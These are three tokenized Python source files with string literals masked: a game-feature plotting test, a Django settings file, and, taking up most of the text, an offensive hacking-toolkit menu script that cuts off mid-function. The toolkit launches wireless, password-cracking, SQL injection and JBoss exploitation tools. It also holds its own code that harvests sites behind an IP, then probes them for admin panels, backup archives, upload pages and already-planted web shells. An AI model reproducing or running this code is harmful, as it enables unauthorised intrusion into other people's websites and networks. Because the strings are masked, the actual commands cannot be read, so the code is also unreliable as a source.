<s> import scripts . common . feature_extractors as feature_extractors <EOL> import scripts . common . file_utils as file_utils <EOL> import matplotlib . pyplot as plt <EOL> def test_paddle_positions ( ) : <EOL> ball_pos = ( ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> prev_ball_pos = ( ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> weights = file_utils . load_weights ( ) <EOL> mbb = feature_extractors . MockBoundingBoxExtractor ( ball_pos , prev_ball_pos ) <EOL> domain = [ ] <EOL> range_weights = [ ] <EOL> actions = [ <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> for x in range ( <NUM_LIT:0> , <NUM_LIT:100> ) : <EOL> state = { } <EOL> best_score = None <EOL> features = mbb . get_features_paddle_x ( state , actions , x ) <EOL> for feature_set in features : <EOL> score = <NUM_LIT:0> <EOL> for f , v in feature_set : <EOL> score += weights [ f ] * v <EOL> if best_score == None or score > best_score : <EOL> best_score = score <EOL> if best_score != None : <EOL> domain . append ( x ) <EOL> range_weights . append ( best_score ) <EOL> plt . scatter ( domain , range_weights ) <EOL> plt . show ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test_paddle_positions ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( __file__ ) ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> } <EOL> } <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' </s>
<s> import sys <EOL> import os <EOL> import time <EOL> import httplib <EOL> import subprocess <EOL> import re , urllib2 <EOL> import socket <EOL> import urllib , sys , json <EOL> import telnetlib <EOL> import glob <EOL> import random <EOL> import Queue <EOL> import threading <EOL> from getpass import getpass <EOL> from commands import * <EOL> from sys import argv <EOL> from platform import system <EOL> from urlparse import urlparse <EOL> from xml . dom import minidom <EOL> from optparse import OptionParser <EOL> from time import sleep <EOL> yes = set ( [ '<STR_LIT:yes>' , '<STR_LIT:y>' , '<STR_LIT>' , '<STR_LIT:Y>' ] ) <EOL> no = set ( [ '<STR_LIT>' , '<STR_LIT:n>' ] ) <EOL> def logo ( ) : <EOL> print """<STR_LIT>""" <EOL> def menu ( ) : <EOL> print ( """<STR_LIT>""" ) <EOL> choice = raw_input ( "<STR_LIT>" ) <EOL> if choice == "<STR_LIT:1>" : <EOL> info ( ) <EOL> elif choice == "<STR_LIT:2>" : <EOL> passwd ( ) <EOL> elif choice == "<STR_LIT:3>" : <EOL> wire ( ) <EOL> elif choice == "<STR_LIT:4>" : <EOL> exp ( ) <EOL> elif choice == "<STR_LIT:5>" : <EOL> snif ( ) <EOL> elif choice == "<STR_LIT>" : <EOL> webhack ( ) <EOL> elif choice == "<STR_LIT>" : <EOL> tnn ( ) <EOL> elif choice == "<STR_LIT>" : <EOL> clearScr ( ) , sys . exit ( ) ; <EOL> elif choice == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def h2ip ( ) : <EOL> host = raw_input ( "<STR_LIT>" ) <EOL> ips = socket . gethostbyname ( host ) <EOL> print ( ips ) <EOL> def ports ( ) : <EOL> clearScr ( ) <EOL> target = raw_input ( '<STR_LIT>' ) <EOL> os . system ( "<STR_LIT>" % target ) <EOL> sys . 
exit ( ) ; <EOL> def ifinurl ( ) : <EOL> print """<STR_LIT>""" <EOL> print ( '<STR_LIT>' ) <EOL> cinurl = raw_input ( "<STR_LIT>" ) <EOL> if cinurl in yes : <EOL> inurl ( ) <EOL> if cinurl in no : <EOL> menu ( ) <EOL> elif cinurl == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def commix ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choicecmx = raw_input ( "<STR_LIT>" ) <EOL> if choicecmx in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> elif choicecmx in no : <EOL> os . system ( '<STR_LIT>' ) ; info ( ) <EOL> def pixiewps ( ) : <EOL> print """<STR_LIT>""" <EOL> choicewps = raw_input ( "<STR_LIT>" ) <EOL> if choicewps in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> if choicewps in no : <EOL> menu ( ) <EOL> elif choicewps == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def webhack ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choiceweb = raw_input ( "<STR_LIT>" ) <EOL> if choiceweb == "<STR_LIT:1>" : <EOL> clearScr ( ) <EOL> maine ( ) <EOL> if choiceweb == "<STR_LIT:2>" : <EOL> clearScr ( ) ; ifinurl ( ) <EOL> if choiceweb == '<STR_LIT:3>' : <EOL> clearScr ( ) ; wppjmla ( ) <EOL> if choiceweb == "<STR_LIT:4>" : <EOL> clearScr ( ) ; gravity ( ) <EOL> if choiceweb == "<STR_LIT:5>" : <EOL> clearScr ( ) ; sqlscan ( ) <EOL> if choiceweb == "<STR_LIT>" : <EOL> clearScr ( ) ; wpminiscanner ( ) <EOL> if choiceweb == "<STR_LIT>" : <EOL> clearScr ( ) ; wppluginscan ( ) <EOL> if choiceweb == "<STR_LIT>" : <EOL> clearScr ( ) ; shelltarget ( ) <EOL> elif choiceweb == "<STR_LIT>" : <EOL> menu ( ) <EOL> elif choiceweb == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def inurl ( ) : <EOL> dork = raw_input ( "<STR_LIT>" ) <EOL> 
output = raw_input ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" . format ( dork , output ) ) <EOL> if cinurl in no : <EOL> insinurl ( ) <EOL> elif cinurl == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def insinurl ( ) : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> clearScr ( ) <EOL> inurl ( ) <EOL> def nmap ( ) : <EOL> choice7 = raw_input ( "<STR_LIT>" ) <EOL> if choice7 in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> elif choice7 in no : <EOL> info ( ) <EOL> elif choice7 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def jboss ( ) : <EOL> os . system ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice9 = raw_input ( "<STR_LIT>" ) <EOL> if choice9 in yes : <EOL> os . system ( "<STR_LIT>" ) , sys . exit ( ) ; <EOL> elif choice9 in no : <EOL> os . system ( '<STR_LIT>' ) ; exp ( ) <EOL> elif choice9 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def wppluginscan ( ) : <EOL> Notfound = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> sitesfile = raw_input ( "<STR_LIT>" ) <EOL> filepath = raw_input ( "<STR_LIT>" ) <EOL> def scan ( site , dir ) : <EOL> global resp <EOL> try : <EOL> conn = httplib . HTTPConnection ( site ) <EOL> conn . request ( '<STR_LIT>' , "<STR_LIT>" + dir ) <EOL> resp = conn . getresponse ( ) . status <EOL> except ( ) , message : <EOL> print "<STR_LIT>" , message <EOL> pass <EOL> def timer ( ) : <EOL> now = time . localtime ( time . time ( ) ) <EOL> return time . asctime ( now ) <EOL> def main ( ) : <EOL> sites = open ( sitesfile ) . 
readlines ( ) <EOL> plugins = open ( filepath ) . readlines ( ) <EOL> for site in sites : <EOL> site = site . rstrip ( ) <EOL> for plugin in plugins : <EOL> plugin = plugin . rstrip ( ) <EOL> scan ( site , plugin ) <EOL> if resp not in Notfound : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" + site <EOL> print "<STR_LIT>" + plugin <EOL> print "<STR_LIT>" , resp <EOL> def sqlmap ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> choice8 = raw_input ( "<STR_LIT>" ) <EOL> if choice8 in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> elif choice8 in no : <EOL> os . system ( '<STR_LIT>' ) ; info ( ) <EOL> elif choice8 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> directories = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> shells = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> upload = [ ] <EOL> def grabuploadedlink ( url ) : <EOL> try : <EOL> for dir in directories : <EOL> currentcode = urllib . urlopen ( url + dir ) . getcode ( ) <EOL> if currentcode == <NUM_LIT:200> or currentcode == <NUM_LIT> : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" + str ( url + dir ) + "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> upload . append ( url + dir ) <EOL> except : <EOL> pass <EOL> def grabshell ( url ) : <EOL> try : <EOL> for upl in upload : <EOL> for shell in shells : <EOL> currentcode = urllib . urlopen ( upl + shell ) . 
getcode ( ) <EOL> if currentcode == <NUM_LIT:200> : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" + str ( upl + shell ) + "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> except : <EOL> pass <EOL> def shelltarget ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> line = raw_input ( "<STR_LIT>" ) <EOL> line = line . rstrip ( ) <EOL> grabuploadedlink ( line ) <EOL> grabshell ( line ) <EOL> def setoolkit ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choiceset = raw_input ( "<STR_LIT>" ) <EOL> if choiceset in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> if choiceset in no : <EOL> clearScr ( ) ; info ( ) <EOL> elif choiceset == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def cupp ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choicecupp = raw_input ( "<STR_LIT>" ) <EOL> if choicecupp in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> elif choicecupp in no : <EOL> clearScr ( ) ; passwd ( ) <EOL> elif choicecupp == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def ncrack ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choicencrack = raw_input ( "<STR_LIT>" ) <EOL> if choicencrack in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> elif choicencrack in no : <EOL> clearScr ( ) ; passwd ( ) <EOL> elif choicencrack == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def reaver ( ) : <EOL> print """<STR_LIT>""" <EOL> creaver = raw_input ( "<STR_LIT>" ) <EOL> if creaver in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . 
system ( "<STR_LIT>" ) <EOL> elif creaver in no : <EOL> clearScr ( ) ; wire ( ) <EOL> elif creaver == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def ssls ( ) : <EOL> print """<STR_LIT>""" <EOL> cssl = raw_input ( "<STR_LIT>" ) <EOL> if cssl in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> if cssl in no : <EOL> snif ( ) <EOL> elif cssl == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def unique ( seq ) : <EOL> seen = set ( ) <EOL> return [ seen . add ( x ) or x for x in seq if x not in seen ] <EOL> def bing_all_grabber ( s ) : <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + s + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> allnoclean = findwebs [ i ] <EOL> findall1 = re . findall ( '<STR_LIT>' , allnoclean ) <EOL> for idx , item in enumerate ( findall1 ) : <EOL> if '<STR_LIT>' not in item : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> else : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> lista . extend ( findall1 ) <EOL> page += <NUM_LIT:50> <EOL> except urllib2 . URLError : <EOL> pass <EOL> final = unique ( lista ) <EOL> return final <EOL> def check_gravityforms ( sites ) : <EOL> import urllib <EOL> gravityforms = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT> : <EOL> gravityforms . 
append ( site ) <EOL> except : <EOL> pass <EOL> return gravityforms <EOL> def gravity ( ) : <EOL> ip = raw_input ( '<STR_LIT>' ) <EOL> sites = bing_all_grabber ( str ( ip ) ) <EOL> gravityforms = check_gravityforms ( sites ) <EOL> for ss in gravityforms : <EOL> print ss <EOL> print '<STR_LIT:\n>' <EOL> print '<STR_LIT>' , len ( gravityforms ) , '<STR_LIT>' <EOL> def shellnoob ( ) : <EOL> print """<STR_LIT>""" <EOL> cshell = raw_input ( "<STR_LIT>" ) <EOL> if cshell in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> if cshell in no : <EOL> exp ( ) <EOL> elif cshell == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def info ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice2 = raw_input ( "<STR_LIT>" ) <EOL> if choice2 == "<STR_LIT:1>" : <EOL> os . system ( '<STR_LIT>' ) ; nmap ( ) <EOL> if choice2 == "<STR_LIT:2>" : <EOL> clearScr ( ) ; setoolkit ( ) <EOL> if choice2 == "<STR_LIT:3>" : <EOL> clearScr ( ) ; ports ( ) <EOL> if choice2 == "<STR_LIT:4>" : <EOL> clearScr ( ) ; h2ip ( ) <EOL> elif choice2 == "<STR_LIT>" : <EOL> clearScr ( ) ; menu ( ) <EOL> elif choice2 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def priv8 ( ) : <EOL> tnn ( ) <EOL> def passwd ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice3 = raw_input ( "<STR_LIT>" ) <EOL> if choice3 == "<STR_LIT:1>" : <EOL> clearScr ( ) ; cupp ( ) <EOL> elif choice3 == "<STR_LIT:2>" : <EOL> clearScr ( ) ; ncrack ( ) <EOL> elif choice3 == "<STR_LIT>" : <EOL> clearScr ( ) ; menu ( ) <EOL> elif choice3 == "<STR_LIT>" : <EOL> menu ( ) <EOL> elif choice3 == "<STR_LIT:3>" : <EOL> fb ( ) <EOL> else : <EOL> menu ( ) <EOL> def wire ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice4 = raw_input ( "<STR_LIT>" ) <EOL> 
if choice4 == "<STR_LIT:1>" : <EOL> clearScr ( ) ; reaver ( ) <EOL> if choice4 == "<STR_LIT:2>" : <EOL> clearScr ( ) ; pixiewps ( ) <EOL> elif choice4 == "<STR_LIT>" : <EOL> menu ( ) <EOL> elif choice4 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def exp ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice5 = raw_input ( "<STR_LIT>" ) <EOL> if choice5 == "<STR_LIT:2>" : <EOL> clearScr ( ) ; sqlmap ( ) <EOL> if choice5 == "<STR_LIT:1>" : <EOL> os . system ( '<STR_LIT>' ) ; jboss ( ) <EOL> if choice5 == "<STR_LIT:3>" : <EOL> clearScr ( ) ; shellnoob ( ) <EOL> if choice5 == "<STR_LIT:4>" : <EOL> os . system ( "<STR_LIT>" ) ; commix ( ) <EOL> elif choice5 == "<STR_LIT>" : <EOL> menu ( ) <EOL> elif choice5 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def snif ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice6 = raw_input ( "<STR_LIT>" ) <EOL> if choice6 == "<STR_LIT:1>" : <EOL> clearScr ( ) ; setoolkit ( ) <EOL> if choice6 == "<STR_LIT:2>" : <EOL> clearScr ( ) ; ssls ( ) <EOL> if choice6 == "<STR_LIT>" : <EOL> clearScr ( ) ; menu ( ) <EOL> elif choice6 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def win ( ) : <EOL> clearScr ( ) <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( ) ; <EOL> def OS ( ) : <EOL> print ( <EOL> """<STR_LIT>""" ) <EOL> system = raw_input ( "<STR_LIT>" ) <EOL> if system == "<STR_LIT:2>" : <EOL> menu ( ) <EOL> elif system == "<STR_LIT:1>" : <EOL> root ( ) <EOL> elif system == "<STR_LIT:3>" : <EOL> win ( ) <EOL> elif system == "<STR_LIT>" : <EOL> OS ( ) <EOL> else : <EOL> sys . exit ( ) ; <EOL> def root ( ) : <EOL> if os . 
getuid ( ) != <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> exit ( ) <EOL> else : <EOL> menu ( ) <EOL> menuu = """<STR_LIT>""" <EOL> def unique ( seq ) : <EOL> """<STR_LIT>""" <EOL> seen = set ( ) <EOL> return [ seen . add ( x ) or x for x in seq if x not in seen ] <EOL> def clearScr ( ) : <EOL> """<STR_LIT>""" <EOL> if system ( ) == '<STR_LIT>' : <EOL> os . system ( '<STR_LIT>' ) <EOL> if system ( ) == '<STR_LIT>' : <EOL> os . system ( '<STR_LIT>' ) <EOL> class TNscan : <EOL> def __init__ ( self , serverip ) : <EOL> self . serverip = serverip <EOL> self . getSites ( False ) <EOL> print menuu <EOL> while True : <EOL> choice = raw_input ( '<STR_LIT>' ) <EOL> if choice == '<STR_LIT:1>' : <EOL> self . getSites ( True ) <EOL> elif choice == '<STR_LIT:2>' : <EOL> self . getJoomla ( ) <EOL> elif choice == '<STR_LIT:3>' : <EOL> self . getWordpress ( ) <EOL> elif choice == '<STR_LIT:4>' : <EOL> self . findPanels ( ) <EOL> elif choice == '<STR_LIT:5>' : <EOL> self . findZip ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . findUp ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . getUsers ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . grabSqli ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> ran = raw_input ( '<STR_LIT>' ) <EOL> self . portScanner ( <NUM_LIT:1> , ran ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . portScanner ( <NUM_LIT:2> , None ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . getServerBanner ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . cloudflareBypasser ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> menu ( ) <EOL> con = raw_input ( '<STR_LIT>' ) <EOL> if con [ <NUM_LIT:0> ] . upper ( ) == '<STR_LIT:N>' : <EOL> exit ( ) <EOL> else : <EOL> clearScr ( ) <EOL> print menuu <EOL> def getSites ( self , a ) : <EOL> """<STR_LIT>""" <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + self . serverip + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . 
urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> allnoclean = findwebs [ i ] <EOL> findall1 = re . findall ( '<STR_LIT>' , allnoclean ) <EOL> for idx , item in enumerate ( findall1 ) : <EOL> if '<STR_LIT>' not in item : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> else : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> lista . extend ( findall1 ) <EOL> page += <NUM_LIT:50> <EOL> except urllib2 . URLError : <EOL> pass <EOL> self . sites = unique ( lista ) <EOL> if a : <EOL> clearScr ( ) <EOL> print '<STR_LIT>' , len ( lista ) , '<STR_LIT>' <EOL> for site in self . sites : <EOL> print site <EOL> def getWordpress ( self ) : <EOL> """<STR_LIT>""" <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + self . serverip + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> wpnoclean = findwebs [ i ] <EOL> findwp = re . findall ( '<STR_LIT>' , wpnoclean ) <EOL> lista . extend ( findwp ) <EOL> page += <NUM_LIT:50> <EOL> except : <EOL> pass <EOL> lista = unique ( lista ) <EOL> clearScr ( ) <EOL> print '<STR_LIT>' , len ( lista ) , '<STR_LIT>' <EOL> for site in lista : <EOL> print site <EOL> def getJoomla ( self ) : <EOL> """<STR_LIT>""" <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> bing = "<STR_LIT>" + self . serverip + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> jmnoclean = findwebs [ i ] <EOL> findjm = re . findall ( '<STR_LIT>' , jmnoclean ) <EOL> lista . 
extend ( findjm ) <EOL> page += <NUM_LIT:50> <EOL> lista = unique ( lista ) <EOL> clearScr ( ) <EOL> print '<STR_LIT>' , len ( lista ) , '<STR_LIT>' <EOL> for site in lista : <EOL> print site <EOL> def findPanels ( self ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" <EOL> adminList = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> clearScr ( ) <EOL> for site in self . sites : <EOL> for admin in adminList : <EOL> try : <EOL> if urllib . urlopen ( site + admin ) . getcode ( ) == <NUM_LIT:200> : <EOL> print "<STR_LIT>" , site + admin <EOL> except IOError : <EOL> pass <EOL> def findZip ( self ) : <EOL> """<STR_LIT>""" <EOL> zipList = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> for site in self . sites : <EOL> for zip1 in zipList : <EOL> try : <EOL> if urllib . urlopen ( site + zip1 ) . 
getcode ( ) == <NUM_LIT:200> : <EOL> print "<STR_LIT>" , site + zip1 <EOL> except IOError : <EOL> pass <EOL> def findUp ( self ) : <EOL> """<STR_LIT>""" <EOL> upList = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> for site in self . sites : <EOL> for up in upList : <EOL> try : <EOL> if ( urllib . urlopen ( site + up ) . getcode ( ) == <NUM_LIT:200> ) : <EOL> html = urllib . urlopen ( site + up ) . readlines ( ) <EOL> for line in html : <EOL> if re . findall ( '<STR_LIT>' , line ) : <EOL> print "<STR_LIT>" , site + up <EOL> except IOError : <EOL> pass <EOL> def getUsers ( self ) : <EOL> """<STR_LIT>""" <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> userslist = [ ] <EOL> for site1 in self . sites : <EOL> try : <EOL> site = site1 <EOL> site = site . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> site = site . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> site = site . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> if '<STR_LIT:->' in site : <EOL> site = site . replace ( '<STR_LIT:->' , '<STR_LIT>' ) <EOL> site = site . replace ( '<STR_LIT:/>' , '<STR_LIT>' ) <EOL> while len ( site ) > 